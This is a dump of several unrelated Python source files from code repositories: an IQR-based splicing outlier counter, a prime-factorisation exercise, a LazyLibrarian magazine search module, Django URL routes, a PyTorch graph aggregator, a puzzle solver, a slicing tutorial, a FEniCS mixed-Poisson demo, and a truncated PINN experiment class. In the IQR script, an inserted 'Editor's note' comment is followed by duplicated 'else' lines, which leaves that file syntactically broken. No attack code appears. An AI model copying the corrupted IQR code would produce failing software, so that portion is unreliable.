codes\n                    if a[1] == 'LUSC':\n                        self.tissue_index['LUNG'].append(ccle)\n                    if a[1] == 'LCLL':\n                        self.tissue_index['LCLL'].append(ccle)\n                    if a[1] == 'DLBC':\n                        self.tissue_index['DLBC'].append(ccle)\n                    if a[1] == 'MM':\n                        self.tissue_index['MM'].append(ccle)\n                    if a[1] == 'LGG':\n                        self.tissue_index['CENTRAL_NERVOUS_SYSTEM'].append(ccle)\n                    if a[1] == 'BRCA':\n                        self.tissue_index['BREAST'].append(ccle)\n                    if a[1] == 'COAD':\n                        
self.tissue_index['LARGE_INTESTINE'].append(ccle)\n                    if a[1] == 'SARC':\n                        self.tissue_index['BONE_AND_SOFT_TISSUE'].append(ccle)\n                    if a[1] == 'OV':\n                        self.tissue_index['OVARY'].append(ccle)\n                    if a[1] == 'SKCM':\n                        self.tissue_index['SKIN'].append(ccle)\n                    if a[1] == 'PAAD':\n                        self.tissue_index['PANCREAS'].append(ccle)\n                    if a[1] == 'HNSC':\n                        self.tissue_index['UPPER_AERODIGESTIVE_TRACT'].append(ccle)\n                    if a[1] == 'KIRC':\n                        self.tissue_index['KIDNEY'].append(ccle)\n                    if a[1] == 'CESC':\n                        self.tissue_index['CERVICAL'].append(ccle)\n                    if a[1] == 'BLCA':\n                        self.tissue_index['URINARY_TRACT'].append(ccle)\n                    if a[1] == 'ESCA':\n                        self.tissue_index['OESOPHAGUS'].append(ccle)\n                    if a[1] == 'LIHC':\n                        self.tissue_index['BILIARY'].append(ccle)\n                    if a[1] == 'STAD':\n                        self.tissue_index['STOMACH'].append(ccle)\n                    if a[1] == 'THCA':\n                        self.tissue_index['THYROID'].append(ccle)\n                    if a[1] == 'PRAD':\n                        self.tissue_index['PROSTATE'].append(ccle)\n                    if a[1] == 'MESO':\n                        self.tissue_index['MESOTHELIOMA'].append(ccle)\n\n                else:\n                    pass\n\n        #for item in self.tissue_index:\n            #print (item, len(self.tissue_index[item]))\n\n        self.total_tissue_outlier_counts = {key: 0 for key, value in self.tissue_index.items()}\n\n        #len(self.tissue_outlier_counts[key]) should equal len(self.tissue_index[key])\n\n    def buildData_tissue(self, inputFile):\n        print(\"Building IQR data..\")\n        # loop through the IQR method here\n        with open(self.inputFile) as file:\n            tsvReader = csv.reader(file, dialect = 'excel-tab')\n            next(tsvReader, None)\n            row_num = 0\n            for row in tsvReader:\n                print(row_num)\n                for tissue_type in self.tissue_index:\n                    if len(self.tissue_index[tissue_type]) >= 7:\n                        self.doIQR_part1(tissue_type, row)\n                    else:\n                        pass\n                row_num += 1\n\n\n    def doIQR_part1(self, tissue_type, row):\n        psi_values = []\n        for index in self.tissue_index[tissue_type]:\n            try:\n                psi_values.append(float(row[index]))\n            except ValueError:\n                continue\n\n        psi_values.sort()\n        row_len = len(psi_values)\n\n        if (row_len % 2) != 0 and row_len > 7:\n            q2 = psi_values[(row_len//2) + 1]\n            q1 = (psi_values[(row_len//2)//2] + psi_values[((row_len//2)//2)-1]) / 2\n            q3 = (psi_values[(row_len//2) + ((row_len//2)//2)] + psi_values[(row_len//2) + (((row_len//2)//2)+1)]) / 2\n            self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n\n        elif row_len == 7:  # Special case\n            q2 = psi_values[(row_len//2) + 1]\n            q1 = psi_values[(row_len//2)//2]\n            q3 = psi_values[(row_len//2)+(((row_len//2)//2)+1)]\n            self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n\n        elif (row_len % 2) == 0 and row_len >= 8:\n            q2 = (psi_values[row_len//2] + psi_values[(row_len//2) - 1]) / 2\n            if (row_len//2) % 2 == 0:\n                q1 = psi_values[((row_len//2)//2) - 1]\n                q3 = psi_values[(row_len//2) + (((row_len//2)//2)+1)]\n                self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n            elif (row_len//2) % 2 != 0:\n                q1 = psi_values[(row_len//2)//2]\n                q3 = psi_values[(row_len//2)+(((row_len//2)//2)+1)]\n                self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n\n        elif row_len <= 6:\n            pass\n\n\n    def doIQR_part2(self, psi_values, tissue, q1, q2, q3, row):\n\n        iqr = q3-q1\n\n        # instead of indexing through the psi_values, let's go by the tissue index instead;\n        # that way we also have access to which cell line the value belonged to\n\n        index = self.tissue_index[tissue]\n\n        for i in range(11, len(self.header)-1):\n            if i in index:\n                try:\n                    if float(row[i]) < (q1-1.5*iqr) or float(row[i]) > (q3+1.5*iqr):\n                        if (q2-float(row[i])) > self.dPSI or (float(row[i])-q2) > self.dPSI:\n                            self.total_tissue_outlier_counts[tissue] += 1\n                        else:\n                            pass\n                    else:\n                        pass\n                except ValueError:\n                    pass\n
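\n    # Editor's note (illustrative numbers): with q1 and q3 the lower/upper\n    # quartiles, iqr = q3 - q1, and a PSI value is counted as an outlier above\n    # only when it falls outside [q1 - 1.5*iqr, q3 + 1.5*iqr] AND differs from\n    # the median q2 by more than the dPSI threshold; e.g. q1=20, q3=40 gives\n    # iqr=20 and fences at -10 and 70.\n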
else:\n                            pass\n                    else:\n                        pass\n                except ValueError:\n                    pass\n\n    def plotEventsBar_allTissue(self):\n        print(self.total_tissue_outlier_counts)\n        print(self.tissue_index['BREAST'])\n        self.colors = ['#FFD54F', '#FFF176', '#81C784', '#4DD0E1', '#64B5F6', '#9575CD', '#F06292', '#EF5350', '#FF8A65', '#A1887F','#90A4AE']\n        tuple_tissue_events = list(self.total_tissue_outlier_counts.items())\n        for tissue in tuple_tissue_events: # (tissue, outlier count)\n            plt.bar((tuple_tissue_events.index(tissue)), height = tissue[1], color = self.colors[6], label = tissue[0] )\n            #plt.bar((x+1.5), height = f_events[x][1], color = self.colors[x], label = f_events[x][0])\n            #print (event)\n            #print (f_events.index(event))\n            #print (self.filteredEvents[event[1]])\n\n        plt.xticks(range(len(self.total_tissue_outlier_counts)), list(self.total_tissue_outlier_counts.keys()), rotation='vertical')\n        plt.title('Outlier Splicing Events across all tissue types with dPSI > %s' % (str(self.dPSI)))\n        plt.ylabel('Outlier Splicing Counts')\n        figname_events_bar = 'all_tissue_types_events_bar_IQR_adjust.png'\n        plt.savefig(figname_events_bar)\n        plt.show()\n\n\ndef main(myCommandLine=None):\n    '''\n    Creates an object of the outputAnalyzer class and passes command line arguments to that class.\n    '''\n    myCommandLine = CommandLine(myCommandLine)\n    myFileReader = outputAnalyzer(myCommandLine)\n    print(\"Your runtime was %s seconds.\" % (time.time() - start_time))\n\nmain()\n","repo_name":"mcatamur/splicing_modulators","sub_path":"IQR/IQR_BI_only.py","file_name":"IQR_BI_only.py","file_ext":"py","file_size_in_byte":9336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"32065592244","text":"# Given a natural number N, write a program that builds the list of prime factors of N.\n\n\ndef Factorization(n):\n    factors = []\n    a = 2  # start with 2, since 1 does not count as a prime number
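\n    # e.g. Factorization(60) -> [2, 2, 3, 5]: divide out the smallest factor repeatedly; trial division only needs to run while a*a <= n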
\n    while a * a <= n:  # this condition keeps 1 out of the list\n        if n % a == 0:\n            factors.append(a)\n            n //= a\n        else:\n            a += 1\n    if n > 1:  # whatever is left over is itself a prime factor\n        factors.append(n)\n    return factors\n\nN = int(input('Enter a natural number: '))\n\nprint(f'Prime factors of {N}: {Factorization(N)}')\n\n# Alternative solution\n# num = int(input(\"Enter a number: \"))\n# i = 2   # the first prime number\n# lst = []\n# old = num\n# while i <= num:\n#     if num % i == 0:\n#         lst.append(i)\n#         num //= i\n#         i = 2\n#     else:\n#         i += 1\n# print(f\"The prime factors of {old} are given in the list: {lst}\")\n","repo_name":"rinakinsha/PythonHW4","sub_path":"Task2/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"10858788841","text":"import time, threading, urllib, urllib2, os, re\n\nfrom xml.etree import ElementTree\nfrom xml.etree.ElementTree import Element, SubElement\n\nimport lazylibrarian\n\nfrom lazylibrarian import logger, database, formatter, providers, sabnzbd, SimpleCache, notifiers\n\nimport lib.fuzzywuzzy as fuzzywuzzy\nfrom lib.fuzzywuzzy import fuzz, process\n\ndef searchmagazines(mags=None):\n\tmaglist = []\n\tmyDB = database.DBConnection()\n\tsearchlist = []\n\n\tthreading.currentThread().name = \"SEARCHMAGS\"\n\n\n\tif mags is None:\n\t\tsearchmags = myDB.select('SELECT Title, Frequency, LastAcquired, IssueDate from magazines WHERE Status=\"Active\"')\n\telse:\n\t\tsearchmags = []\n\t\tfor magazine in mags:\n\t\t\tsearchmags_temp = myDB.select('SELECT Title, Frequency, LastAcquired, IssueDate from magazines WHERE Title=? AND Status=\"Active\"', [magazine['bookid']])\n\t\t\tfor terms in searchmags_temp:\n\t\t\t\tsearchmags.append(terms)\n\n\tfor searchmag in searchmags:\n\t\tbookid = searchmag[0]\n\t\tsearchterm = searchmag[0]\n\t\tfrequency = searchmag[1]\n\t\tlast_acquired = searchmag[2]\n\t\tissue_date = searchmag[3]\n\n\t\tdic = {'...':'', ' & ':' ', ' = ': ' ', '?':'', '$':'s', ' + ':' ', '\"':'', ',':'', '*':''}\n\n\t\tsearchterm = formatter.latinToAscii(formatter.replace_all(searchterm, dic))\n\t\tsearchterm = re.sub('[\\.\\-\\/]', ' ', searchterm).encode('utf-8')\n\t\tsearchlist.append({\"bookid\": bookid, \"searchterm\": searchterm})\n\n\tif not lazylibrarian.SAB_HOST and not lazylibrarian.BLACKHOLE:\n\t\tlogger.info('No download method is set, use SABnzbd or blackhole')\n\n\tif not lazylibrarian.NEWZNAB and not lazylibrarian.NEWZNAB2 and not lazylibrarian.USENETCRAWLER:\n\t\tlogger.info('No providers are set. Try using NEWZNAB.')\n\n\tif searchlist == []:\n\t\tlogger.info('There is nothing to search for. Mark some magazines as active.')\n\n\tfor book in searchlist:\n\t\tresultlist = []\n\t\tif lazylibrarian.NEWZNAB:\n\t\t\tlogger.debug('Searching NZB\'s at provider %s ...' % lazylibrarian.NEWZNAB_HOST)\n\t\t\tresultlist = providers.NewzNab(book, \"1\")\n\n\t\tif lazylibrarian.NEWZNAB2:\n\t\t\tlogger.debug('Searching NZB\'s at provider %s ...' 
% lazylibrarian.NEWZNAB_HOST2)\n\t\t\tresultlist += providers.NewzNab(book, \"2\")\n\n\t\tif lazylibrarian.USENETCRAWLER: \n\t\t\tlogger.info('Searching NZB\\'s at provider UsenetCrawler ...')\n\t\t\tresultlist += providers.UsenetCrawler(book, 'mag')\n\n\t\t\t#AHHH pass the book not the search book - bloody names the same, so wrong keys passing over\n\n\t\tif not resultlist:\n\t\t\tlogger.debug(\"Adding book %s to queue.\" % book['searchterm'])\n\n\t\telse:\n\t\t\tbad_regex = 0\n\t\t\told_date = 0\n\t\t\ttotal_nzbs = 0\n\t\t\tnew_date = 0\n\t\t\tfor nzb in resultlist:\n\t\t\t\ttotal_nzbs = total_nzbs + 1\n\t\t\t\tbookid = nzb['bookid']\n\t\t\t\tnzbtitle = nzb['nzbtitle']\n\t\t\t\tnzburl = nzb['nzburl']\n\t\t\t\tnzbprov = nzb['nzbprov']\n\t\t\t\tnzbdate_temp = nzb['nzbdate']\n\t\t\t\tnzbsize_temp = nzb['nzbsize']\n\t\t\t\tnzbsize = str(round(float(nzbsize_temp) / 1048576,2))+' MB'\n\t\t\t\tnzbdate = formatter.nzbdate2format(nzbdate_temp)\n\n\t\t\t\tcheckifmag = myDB.select('SELECT * from magazines WHERE Title=?', [bookid])\n\t\t\t\tif checkifmag:\n\t\t\t\t\tfor results in checkifmag:\n\t\t\t\t\t\tcontrol_date = results['IssueDate']\n\t\t\t\t\t\tfrequency = results['Frequency']\n\t\t\t\t\t\tregex = results['Regex']\n\n\t\t\t\t\tnzbtitle_formatted = nzb['nzbtitle'].replace('.',' ').replace('/',' ').replace('+',' ').replace('_',' ').replace('(','').replace(')','')\n\t\t\t\t\t#Need to make sure that substrings of magazine titles don't get found (e.g. Maxim USA will find Maximum PC USA)\n\t\t\t\t\tkeyword_check = nzbtitle_formatted.replace(bookid,'')\n\t\t\t\t\t#remove extra spaces if they're in a row\n\t\t\t\t\tnzbtitle_exploded_temp = \" \".join(nzbtitle_formatted.split())\n\t\t\t\t\tnzbtitle_exploded = nzbtitle_exploded_temp.split(' ')\n\n\t\t\t\t\tbookid_exploded = bookid.split(' ')\n\n\t\t\t\t\t#Make sure that NZB contains exact magazine phrase, and that NZB title begins with magazine title\n\t\t\t\t\t#logger.debug('[%s] !=[%s] & [%s] == [%s]' %(keyword_check.lower(),nzbtitle_formatted.lower(),nzbtitle_exploded[0].lower(),bookid_exploded[0].lower()))\n\t\t\t\t\tif keyword_check.lower() != nzbtitle_formatted.lower() and nzbtitle_exploded[0].lower() == bookid_exploded[0].lower():\n\t\t\t\t\t\t\n\t\t\t\t\t\tif len(nzbtitle_exploded) > 1:\n\t\t\t\t\t\t\t#regexA = DD MonthName YYYY OR MonthName YYYY\n\t\t\t\t\t\t\tregexA_year = nzbtitle_exploded[len(nzbtitle_exploded)-1]\n\t\t\t\t\t\t\tregexA_month_temp = nzbtitle_exploded[len(nzbtitle_exploded)-2]\n\t\t\t\t\t\t\tregexA_month = formatter.month2num(regexA_month_temp)\n\n\t\t\t\t\t\t\tif frequency == \"Weekly\" or frequency == \"BiWeekly\":\n\t\t\t\t\t\t\t\tregexA_day = nzbtitle_exploded[len(nzbtitle_exploded)-3].zfill(2)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tregexA_day = '01'\n\t\t\t\t\t\t\tnewdatish_regexA = regexA_year+regexA_month+regexA_day\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tint(newdatish_regexA)\n\t\t\t\t\t\t\t\tnewdatish = regexA_year+'-'+regexA_month+'-'+regexA_day\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t#regexB = MonthName DD YYYY\n\t\t\t\t\t\t\t\tregexB_year = nzbtitle_exploded[len(nzbtitle_exploded)-1]\n\t\t\t\t\t\t\t\tregexB_day = nzbtitle_exploded[len(nzbtitle_exploded)-2].zfill(2)\n\t\t\t\t\t\t\t\tregexB_month_temp = nzbtitle_exploded[len(nzbtitle_exploded)-3]\n\t\t\t\t\t\t\t\tregexB_month = formatter.month2num(regexB_month_temp)\n\t\t\t\t\t\t\t\tnewdatish_regexB = regexB_year+regexB_month+regexB_day\n\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\tint(newdatish_regexB)\n\t\t\t\t\t\t\t\t\tnewdatish = 
regexB_year+'-'+regexB_month+'-'+regexB_day\n\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t#regexC = YYYY-MM\n\t\t\t\t\t\t\t\t\tregexC_last = nzbtitle_exploded[len(nzbtitle_exploded)-1]\n\t\t\t\t\t\t\t\t\tregexC_exploded = regexC_last.split('-')\n\t\t\t\t\t\t\t\t\tif len(regexC_exploded) == 2:\n\t\t\t\t\t\t\t\t\t\tregexC_year = regexC_exploded[0]\n\t\t\t\t\t\t\t\t\t\tregexC_month = regexC_exploded[1].zfill(2)\n\t\t\t\t\t\t\t\t\t\tregexC_day = '01'\n\t\t\t\t\t\t\t\t\t\tnewdatish_regexC = regexC_year+regexC_month+regexC_day\n\t\t\t\t\t\t\t\t\telif len(regexC_exploded) == 3:\n\t\t\t\t\t\t\t\t\t\tregexC_year = regexC_exploded[0]\n\t\t\t\t\t\t\t\t\t\tregexC_month = regexC_exploded[1].zfill(2)\n\t\t\t\t\t\t\t\t\t\tregexC_day = regexC_exploded[2].zfill(2)\n\t\t\t\t\t\t\t\t\t\tnewdatish_regexC = regexC_year+regexC_month+regexC_day\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tnewdatish_regexC = 'Invalid'\n\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tint(newdatish_regexC)\n\t\t\t\t\t\t\t\t\t\tnewdatish = regexC_year+'-'+regexC_month+'-'+regexC_day\n\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\tlogger.debug('NZB %s not in proper date format.' % nzbtitle_formatted)\n\t\t\t\t\t\t\t\t\t\tbad_regex = bad_regex + 1\n\t\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t#Don't want to overwrite status = Skipped for NZBs that have been previously found\n\t\t\t\t\t\twanted_status = myDB.select('SELECT * from wanted WHERE NZBtitle=?', [nzbtitle])\n\t\t\t\t\t\tif wanted_status:\n\t\t\t\t\t\t\tfor results in wanted_status:\n\t\t\t\t\t\t\t\tstatus = results['Status']\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tstatus = \"Skipped\"\n\n\t\t\t\t\t\tcontrolValueDict = {\"NZBurl\": nzburl}\n\t\t\t\t\t\tnewValueDict = {\n\t\t\t\t\t\t\t\"NZBprov\": nzbprov,\n\t\t\t\t\t\t\t\"BookID\": bookid,\n\t\t\t\t\t\t\t\"NZBdate\": nzbdate,\n\t\t\t\t\t\t\t\"NZBtitle\": nzbtitle,\n\t\t\t\t\t\t\t\"AuxInfo\": newdatish,\n\t\t\t\t\t\t\t\"Status\": status,\n\t\t\t\t\t\t\t\"NZBsize\": nzbsize\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\tmyDB.upsert(\"wanted\", newValueDict, controlValueDict)\n\t\t\t\t\t\t#print nzbtitle_formatted\n\t\t\t\t\t\t#print newdatish\n\n\t\t\t\t\t\tif control_date is None:\n\t\t\t\t\t\t\tmyDB.upsert(\"magazines\", {\"LastAcquired\": nzbdate, \"IssueDate\": newdatish}, {\"Title\": bookid})\n\t\t\t\t\t\t\tmaglist.append({\n\t\t\t\t\t\t\t\t'bookid': bookid,\n\t\t\t\t\t\t\t\t'nzbprov': nzbprov,\n\t\t\t\t\t\t\t\t'nzbtitle': nzbtitle,\n\t\t\t\t\t\t\t\t'nzburl': nzburl\n\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\tnew_date = new_date + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcomp_date = formatter.datecompare(newdatish, control_date)\n\t\t\t\t\t\t\tif comp_date > 0:\n\t\t\t\t\t\t\t\tmyDB.upsert(\"magazines\", {\"LastAcquired\": nzbdate, \"IssueDate\": newdatish}, {\"Title\": bookid})\n\t\t\t\t\t\t\t\tmaglist.append({\n\t\t\t\t\t\t\t\t\t'bookid': bookid,\n\t\t\t\t\t\t\t\t\t'nzbprov': nzbprov,\n\t\t\t\t\t\t\t\t\t'nzbtitle': nzbtitle,\n\t\t\t\t\t\t\t\t\t'nzburl': nzburl\n\t\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\t\tnew_date = new_date + 1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tlogger.debug('This issue of %s is old; skipping.' % nzbtitle_formatted)\n\t\t\t\t\t\t\t\told_date = old_date + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tlogger.debug('NZB [%s] does not completely match search term [%s].' % (nzbtitle, bookid))\n\t\t\t\t\t\tbad_regex = bad_regex + 1\n\n\t\t\tlogger.info('Found %s NZBs for %s. 
%s are new, %s are old, and %s have bad date formatting' % (total_nzbs, bookid, new_date, old_date, bad_regex) )\n\treturn maglist\n","repo_name":"relder251/LazyLibrarianRefresh","sub_path":"lazylibrarian/searchmag.py","file_name":"searchmag.py","file_ext":"py","file_size_in_byte":7993,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"28908027138","text":"from django.urls import path\nfrom .views import homepage, AutoreDetailAL, AutoreListAL, LibroDetailAL, LibroListAL\n\napp_name = 'libreria'\nurlpatterns = [\n path('', homepage, name='libreria_home'),\n path('libri/', LibroListAL.as_view(), name='libri_list'),\n path('libri//', LibroDetailAL.as_view(), name='libro_detail'),\n path('autori/', AutoreListAL.as_view(), name='autori_list'),\n path('autori//', AutoreDetailAL.as_view(), name='autore_detail'),\n]\n","repo_name":"Agostoner02/progetto1","sub_path":"libreria/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"575787749","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom typing import Dict, List, Tuple\n\n\nclass Aggregator(nn.Module):\n\n def __init__(self, input_dim, output_dim):\n super(Aggregator, self).__init__()\n self.linear_layer = nn.Linear(\n in_features=input_dim,\n out_features=output_dim\n )\n self.input_dim = input_dim\n self.output_dim = output_dim\n\n\n def forward(self, neighbors: List[Tuple[int, float]], features_map: Dict[int, torch.Tensor]) -> torch.Tensor:\n \"\"\"\n :param neighbors: List[Tuple[int, float]], a list of neighbor nodes along with the weights\n :param embeddings: mappings from each of the node id to its embedding\n :return: aggregated embedding\n \"\"\"\n neighbor_indices = [v for v, _ in neighbors]\n weights = torch.tensor([w for _, w in neighbors])\n weights = weights / weights.sum()\n id2node = {i: v for i, (v, w) in enumerate(neighbors)}\n\n n_neighbors = len(neighbors)\n if n_neighbors == 0:\n return torch.zeros(self.input_dim)\n\n assert features_map[neighbor_indices[0]].size(0) == self.input_dim\n hiddens = torch.zeros(n_neighbors, self.output_dim)\n\n for i, v in id2node.items():\n hiddens[i] = F.relu(self.linear_layer(features_map[v]))\n\n \"\"\"\n hiddens: (n_nodes, output_dim)\n hiddens.unsqueeze(1): (n_nodes, 1, output_dim)\n \n weights: (n_nodes,)\n weights.unsqueeze(1).unsqueeze(1): (n_nodes, 1, 1)\n \n *: element-wise multiplication\n \n hiddens.unsqueeze(1) * weights.unsqueeze(1).unsqueeze(1): (n_nodes, 1, output_dim)\n \n \"\"\"\n agg = (hiddens.unsqueeze(1) * weights.unsqueeze(1).unsqueeze(1)).squeeze(1) # (n_nodes, output_dim)\n agg = agg.sum(dim=0, keepdim=False)\n\n return agg\n\n\ndef test_aggregator():\n neighbors = [(3, 0.3), (1, 0.1), (4, 0.4)]\n\n V = 5\n feat_dim = 20\n weights = torch.randn(size=(V, feat_dim))\n\n embeddings = nn.Embedding(\n num_embeddings=V,\n embedding_dim=feat_dim\n )\n embeddings.weight = torch.nn.Parameter(weights)\n embeddings.weight.requires_grad = False\n\n features_map = {v: embeddings(torch.tensor(v)) for v, prob in neighbors}\n\n aggregator = Aggregator(input_dim=feat_dim, output_dim=3)\n n = aggregator(neighbors, features_map)\n print('input:')\n print(embeddings)\n print('\\n\\noutput:')\n print(n)\n\nif __name__ == '__main__':\n 
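# quick demo: aggregate three weighted neighbor embeddings and print the result
    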
test_aggregator()\n","repo_name":"cheng-w-liu/computational-notes","sub_path":"Deep_Learning_algorithms_test/PinSAGE_PyTorch/aggregators.py","file_name":"aggregators.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"71484339367","text":"import os\nfrom typing import Dict\nfrom task1 import parse_input\n\ndef calculate_answer(bags: Dict[str, Dict[str, int]], color: str) -> int:\n    return get_contained_bags(bags, color)\n\ndef get_contained_bags(bags: Dict[str, Dict[str, int]], color: str) -> int:\n    bags_contained = 0\n    for k, v in bags[color].items():\n        bags_contained += v * (1 + get_contained_bags(bags, k))\n    return bags_contained\n\nif __name__ == \"__main__\":\n    dir_path = os.path.dirname(os.path.realpath(__file__))\n    file_path = os.path.join(dir_path, 'input.txt')\n    bags = parse_input(file_path)\n    answer = calculate_answer(bags, \"shiny gold\")\n    print(answer)","repo_name":"nagybalint/advent-of-code-2020","sub_path":"day_7/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"27600574114","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# @Author : mofei\n# @Time : 2019/6/25 18:57\n# @File : p11_naming_slice.py\n# @Software: PyCharm\n\n\"\"\"\nNamed slices\n\nLarge amounts of hard-coded indices make code much less readable and maintainable.\nUsing slice() makes the code clearer and easier to read.\n\"\"\"\n\n# Extract fields at fixed positions from a record (e.g. a file or a similar format)\nrecord = '....................100 .......513.25 ..........'\nSHARES = slice(20, 23)\nPRICE = slice(31, 37)\ncost = int(record[SHARES]) * float(record[PRICE])\nprint(cost)\n\n# Basic usage of slice objects\nitems = [0, 1, 2, 3, 4, 5, 6]\na = slice(2, 4)\nprint(items[a])\nitems[a] = [10, 11]\nprint(items)\ndel items[a]\nprint(items)\n\n# Read the attributes of a slice object\na = slice(5, 50, 2)\nprint(a.start, a.stop, a.step)\n\n# A slice can be mapped onto a sequence of known size by calling its indices(size) method.\n# It returns a (start, stop, step) triple whose values are clipped to fit within the bounds of that sequence\na = slice(1, 50)\ns = 'HelloWorld'\nprint(a.indices(len(s)))\nfor i in range(*a.indices(len(s))):\n    print(s[i])\n","repo_name":"mofei952/cookbook","sub_path":"c01_data_structures_and_algorithms/p11_naming_slice.py","file_name":"p11_naming_slice.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"34255741761","text":"\"\"\"Solves a mixed-poisson problem using schur complement approach\nimplemented via built-in function calls to PETSc\"\"\"\n\n## Future-proofing for Python3+ ##\nfrom __future__ import print_function\n\n## Import preliminaries ##\nfrom dolfin import *\nfrom dolfin_adjoint import *\nfrom pfibs import *\nfrom pfibs.pfibs_adjoint import *\nimport dolfin as df\n\n## Create mesh ##\nmesh = UnitSquareMesh(40,40)\nV = FiniteElement(\"RT\",mesh.ufl_cell(),1)\nP = FiniteElement(\"DG\",mesh.ufl_cell(),0)\nW = FunctionSpace(mesh,V*P)\n(u,p) = TrialFunctions(W)\n(v,q) = TestFunctions(W)\nw = Function(W)\n\n## Weak formulation ##\nnu = Constant(5.0)\nf = Expression(\"10*exp(-nu*(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)\", nu=nu, degree=2)\nf.dependencies = [nu]\nf.user_defined_derivatives = {nu: Expression(\"10*exp(-nu*(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)*(-1*(pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2)) / 0.02)\", nu=nu, degree=2)}\na = (dot(v,u) + div(v)*p + q*div(u))*dx\nL = -q*f*dx\n\n## Boundary conditions ##\nclass BoundarySource(UserExpression):\n    def __init__(self, mesh, 
**kwargs):\n super().__init__(self,**kwargs)\n self.mesh = mesh\n def eval_cell(self, values, x, ufc_cell):\n cell = Cell(self.mesh, ufc_cell.index)\n n = cell.normal(ufc_cell.local_facet)\n g = sin(5.0*x[0])\n values[0] = g*n[0]\n values[1] = g*n[1]\n def value_shape(self):\n return (2,)\ndef boundary(x):\n return x[1] < DOLFIN_EPS or x[1] > 1.0 - DOLFIN_EPS\n\nG = BoundarySource(mesh, degree=2)\nbc = DirichletBC(W.sub(0), G, boundary)\n\n## Setup block problem ##\nproblem = BlockProblem(a,L,w,bcs=bc)\n\n## Built-in function calls ##\nproblem.field('u',0,solver={\n 'ksp_type':'preonly',\n 'pc_type':'bjacobi'\n})\nproblem.field('p',1,solver={\n 'ksp_type':'preonly',\n 'pc_type':'hypre'\n})\nproblem.split('s1',['u','p'],solver={\n 'ksp_type':'gmres',\n 'pc_fieldsplit_type':'schur',\n 'pc_fieldsplit_schur_fact_type':'upper',\n 'pc_fieldsplit_schur_precondition':'selfp',\n 'ksp_monitor_true_residual':True\n})\n\n## Setup block solver ##\nsolver = LinearBlockSolver(problem)\n\n## Solve problem ##\ntimer = Timer(\"Solve Problem\")\nsolver.solve()\ntimer.stop()\n\nlist_timings(TimingClear.keep, [TimingType.wall])\n\n(u,p) = w.split()\nG = assemble(dot(u,u)*dx)\nh = Constant(1)\nG_hat = ReducedFunctional(G, Control(nu))\nconv_rate = taylor_test(G_hat, nu, h)\n","repo_name":"NREL/pfibs","sub_path":"demo/documented/mixed-poisson/demo_mp-adjoint.py","file_name":"demo_mp-adjoint.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"40098123169","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 24 16:44:59 2021\n\n@author: rober\n\"\"\"\n\nfrom functools import partial\nfrom pathlib import Path\nfrom typing import Callable, List\n\nfrom tqdm import tqdm\n\nfrom src.config import results_path\nfrom experiments.BaseExperiment import BaseExperiment\nfrom experiments.Models.VanillaPinn import VanillaBoundaryOperator, VanillaOperator\nfrom lib.IntelligentModels.NNFlow import NNFlow\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.random import normal\n\nfrom experiments.utils import plot_predictions, Potencial, g, n\nfrom experiments.Models.parameters import EPSILON, alpha, k, potential, n_train_r, \\\n r_weight_proportion, domain_to_predict, num_repetitions, \\\n exact_solution_function\n\nfrom lib.DifferentialEquations.DifferentialEquation import Condition, DifferentialEquation\nfrom lib.IntelligentModels.BaseModelFlow import BaseModelFlow\nfrom lib.PINN_models.PinnFlow import PinnFlow\nfrom lib.utils import Bounds\n\n\nclass VanillaCurriculumPinn(BaseExperiment):\n def __init__(self, num_epsilons: int, epsilon: float, potential: Potencial, g: Callable, alpha: float, k: float,\n n: Callable, loss_metric=\"l2\"):\n self.num_epsilons = num_epsilons\n self.loss_metric = loss_metric\n self.epsilon = epsilon\n self.potential = potential\n self.g = g\n self.alpha = alpha\n self.k = k\n self.n = n\n\n def 